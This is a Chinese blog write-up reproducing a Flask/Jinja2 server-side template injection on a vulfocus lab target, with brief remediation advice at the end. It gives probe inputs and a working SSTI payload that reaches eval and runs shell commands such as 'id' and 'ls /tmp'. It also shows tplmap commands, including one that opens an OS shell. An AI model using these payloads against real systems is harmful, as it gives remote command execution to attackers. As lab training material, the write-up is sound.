flask-ssti 模板注入复现

所有文章,仅供安全研究与学习之用,后果自负!

flask-ssti 模板注入复现

0x01 漏洞描述

Flask 是一个 web 框架。也就是说 Flask 为你提供工具,库和技术来允许你构建一个 web 应用程序。这个 wdb 应用程序可以使一些 web 页面、博客、wiki、基于 web 的日历应用或商业网站。

0x02 影响范围

0x03 漏洞复现

访问靶场
在这里插入图片描述

1 手工验证漏洞是否存在

?name=123
?name=<script>alert(123)</script>
?name={{2*3}}

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

2.执行命令

poc 如下
修改 “id” 即可

?name={% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__ == 'catch_warnings' %}{% for b in c.__init__.__globals__.values() %}{% if b.__class__ == {}.__class__ %}{% if 'eval' in b.keys() %}{{ b['eval']('__import__("os").popen("id").read()') }}{% endif %}{% endif %}  {% endfor %}{% endif %}{% endfor %}

在这里插入图片描述

获取flag

http://vulfocus.fofa.so:24935/?name={% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__ == 'catch_warnings' %}{% for b in c.__init__.__globals__.values() %}{% if b.__class__ == {}.__class__ %}{% if 'eval' in b.keys() %}{{ b['eval']('__import__("os").popen("ls /tmp").read()') }}{% endif %}{% endif %}  {% endfor %}{% endif %}{% endfor %}

在这里插入图片描述

tplmap工具验证

python2 运行

python2 tplmap.py   -u 'http://vulfocus.fofa.so:24935/?name=guest'

存在漏洞
在这里插入图片描述

执行系统命令

python2 tplmap.py  --os-shell  -u 'http://vulfocus.fofa.so:24935/?name=guest'

在这里插入图片描述

0x04 漏洞修复

针对于不同的模板引擎,该漏洞的修复方法会有所不同,但如果在传递给模板指令之前,对用户输入进行安全过滤的话,则可以大大减少这类威胁。

另一种防御方法是使用沙箱环境,将危险的指令删除/禁用,或者对系统环境进行安全加固。

  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值